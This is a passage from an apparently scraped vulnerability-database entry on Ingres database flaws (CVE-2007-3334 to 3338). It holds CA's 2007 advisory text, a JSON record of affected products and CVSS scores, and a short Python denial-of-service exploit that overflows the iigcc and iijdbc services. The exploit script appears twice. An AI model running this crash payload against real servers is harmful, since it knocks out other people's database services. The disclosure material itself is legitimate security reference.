r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0398",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "r3"
},
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2.5"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3337",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2007-3337",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3337",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2007-3337",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-394",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \nIngres Multiple Vulnerabilities\n\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\n\nCA Advisory Date: 2007-06-21\n\nReported By: NGSSoftware, and iDefense\n\nImpact: Attackers can potentially execute arbitrary code, or \noverwrite files. \n\nSummary: Various CA products that embed Ingres products contain \nmultiple vulnerabilities that can allow an attacker to potentially \nexecute arbitrary code. CA has issued fixes, to address all of \nthese vulnerabilities, for all supported CA products that may be \naffected. \n\n1) Ingres controllable pointer overwrite vulnerability (reported \nby NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]\nDescription: An unauthenticated attacker can potentially execute \narbitrary code within the context of the database server. \n\n2) Ingres remote unauthenticated pointer overwrite #2 (reported by \nNGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]\nDescription: An unauthenticated attacker can exploit a pointer \noverwrite vulnerability to execute arbitrary code within the \ncontext of the database server. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. \n\n6) Communication server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the communications server (iigcc.exe). This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. \n\n7) Data Access/JDBC server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \nserver in older releases. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3337"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3337",
"trust": 2.9
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "SECUNIA",
